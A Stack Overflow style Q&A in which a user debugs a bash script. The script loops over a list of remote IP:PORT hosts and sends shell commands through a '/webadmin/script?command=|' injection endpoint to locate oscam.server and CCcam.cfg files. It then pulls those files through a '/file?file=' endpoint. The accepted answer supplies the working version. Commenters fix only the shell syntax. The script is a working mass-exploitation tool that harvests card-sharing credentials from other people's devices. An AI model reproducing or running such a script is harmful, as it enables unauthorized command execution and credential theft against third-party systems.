# One liner working, but in bash script not working, why?

Tags: bash, unix

oneliner

```
curl "127.0.0.1:81/webadmin/script?command=|ps%20-T%20-f" | grep oscam | awk 'BEGIN{IGNORECASE=1;oscam;RS="<br>"}; {print $11};' | awk '{print "/file?file="$0"/oscam.server"}' | awk '!x[$0]++'
```

and bash style

```
#!/bin/sh
OSCAM="/webadmin/script?command=|ps%20-T%20-f" | grep oscam | awk 'BEGIN{IGNORECASE=1;oscam;RS="<br>"}; {print $11};' | awk '{print "/file?file="$0"/oscam.server"}' | awk '!x[$0]++' > oscam.source.tmp
URL2=$(cat oscam.source.tmp) 
for URL in `cat links.md`; do echo $URL; curl -m 5 $1 "$URL$OSCAM" > oscam.source; curl -m 5 $1 "$URL$URL2"
done > oscam.server.new
```

the main problem for me on script didnt running normally, didnt gave an output for `oscam.source.tmp`

Comment: `curl ...` is not the same as `OSCAM=...`. Is that a typo?

Comment: wait i totally forget what i doing, reading from links.md contains **IP:PORT** then after runnig the script with `OSCAM` parameter, when finishing i gave new output and i want runinng again with 'URL2' position, if you understood, then finally print to the new file

Comment: `| grep oscam ..` is not a set of arguments to `curl`; you can simply stuff the pipeline in a variable to append to the base URL.

Comment: @wjandrea `curl ...` is not the same as `OSCAM=...` no is not that typo

Comment: @ZoltánVeres The oneliner does `curl ... | grep oscam | ...`, but in the script it's `OSCAM=... | grep oscam | ...`. These are not at all equivalent, and the script doesn't do anything even slightly useful. The `OSCAM=...` command doesn't produce any output, so nothing gets piped to `grep` as input. Furthermore, the assignment to the `OSCAM` variable happens in a subshell (because it's part of a pipeline), so it has no effect in the rest of the script.

Comment: Is this a great Q? no, but -3 downvotes for a first Q that included an attempt to solve their own problem?! I'm upvoting and hope the O.P. can explain better what they're trying to achieve. @ZoltánVeres : You'll do well to learn to debug your shell scripts one layer at a time. For instance, does just running `awk 'BEGIN{IGNORECASE=1;oscam;RS="<br>"}; {print $11};'` by itself really produce the output you expect? And what is `oscam;` doing there? That is a no op (I'm almost sure). Good luck!\

Comment: can't say anything to *awk* but for the oneliner you run *grep + awk* on the **output** of *curl*, therefore you need to move this *grep + awk* part behind *curl $URL$OSCAM* (everything in above line after *OSCAM="..."* is simply "ignored" - assigning a value to a variable doesn't give any output to pipe)

Answer (score 0):

ok refined the script

now finally working :),

```
#!/bin/bash
for URL in $(< links.md); do echo curl -L -m 5 $1 "'"$URL"/webadmin/script?command=|find%20/etc%20/var%20/usr%20|%20egrep%20%22CCcam.cfg|oscam.server%22'" | bash - | egrep "oscam.server<br>|CCcam.cfg" | awk 'BEGIN{RS="<br>"} {print $1}' > oscam.source.bak && awk '!/^$/' oscam.source.bak | awk '$0="/file?file="$0' > oscam.temp;
    for URL2 in $(< oscam.temp); do echo curl -L -m 5 $1 "$URL$URL2" | bash -
    done
done > oscam.server.new
```